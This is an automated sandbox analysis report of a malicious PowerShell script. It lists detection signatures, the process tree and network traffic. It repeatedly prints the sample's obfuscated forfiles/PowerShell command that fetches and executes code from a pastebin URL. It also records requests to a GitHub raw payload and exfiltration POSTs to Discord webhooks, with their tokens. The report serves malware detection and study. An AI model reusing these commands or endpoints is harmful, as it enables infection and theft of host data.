Windows Analysis Report
cr_asm_atCAD.ps1

Overview

General Information

Sample name: cr_asm_atCAD.ps1
Analysis ID: 1534226
MD5: 7a4c9d478466dab6eabf75e7e0c2ffb4
SHA1: 2156ef7e9cee3767d71d9f98921fe4aec7bb72de
SHA256: 9652251a33ecf9ca8fd76b9168a5459fbdd696889f5c359b20e8e109a308d333
Tags: Neth3N, ps1, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 2944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3428 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 4540 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3524 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 1928 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5208 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 2944 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 5180 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 2716 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Source | Rule | Description | Author | Strings
amsi64_5180.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
amsi64_2716.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 4540, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 3524, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", ProcessId: 2944, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", ProcessId: 2944, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T17:58:30.423322+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.8 | 49717 | 162.159.136.232 | 443 | TCP
2024-10-15T17:58:37.042189+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 162.159.136.232 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T17:58:17.350944+0200 | 2857658 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 162.159.136.232 | 443 | TCP

AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.8% probability
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb< source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb4000052534131000400000100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdb& source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbR, source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbP/,K source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1864209009.000002019A767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941161276.00000201B4A00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdbi source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb6K source: powershell.exe, 0000000C.00000002.1943252359.00000201B4A11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdlll source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1872900029.000001D4FB210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1873629350.000001D4FB250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.1872900029.000001D4FB210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb1934e089$ source: powershell.exe, 0000000C.00000002.1941161276.00000201B4A00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbvice source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CRYPT_DEBUG_FORCE_FREE_LIBRARY.pdb! source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

Networking

Source: Network traffic | Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.8:49710 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49717 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49718 -> 162.159.136.232:443
Source: unknown | DNS query: name: pastebin.com
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 162.159.136.232
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: FASTLYUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 216 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 299 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 299 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 216 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 15:58:30 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729007911 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjDcbXOtu8bjtVf6UAQTIHmcX3N1YRay35WRcBJEklTHaXW5y8fHiwFoTubuCmErCybkxzVGv%2F8FR0Jgr1Cu2v4SisBHOZhAuPrV3eN468cKhBsNItqX%2BTH6%2BYQp"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=19a8aa67251f730d1a261752bff7f45d45000c44-1729007910; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=sUAjXejYQfsWL.eiu_X9eQrmoyrWjOvVstrleAJG2ZQ-1729007910365-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3102cf2cef461a-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 15:58:36 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729007918 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5rW2ejVkeP9d6fx5BgcD39XtRYbhZ13KlAeK4EP3cESF0Fee9RUk7FuTNVA3mGkjYwemcC1x%2FJyvOD0BcrV7UQ3U0uXXktV6qfbLRpLdciqVijT0oTT7xdKo2KP"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=17847e3806a41616fa7f1cec02ab096d50e81535-1729007916; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=bhfVtuJAed2Y8F6zsSmHM7BsWdGa30oKEA6EcrLXXC0-1729007916984-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3102f8887ee70e-DFW
Source: powershell.exe, 00000007.00000002.1872751109.000001D4FB130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 0000000C.00000002.1869396878.000002019C5D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: powershell.exe, 00000000.00000002.1618712133.000001F701E27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: powershell.exe, 00000000.00000002.1644785909.000001F7101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1644785909.000001F71006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48133C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2mand
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubuserconte
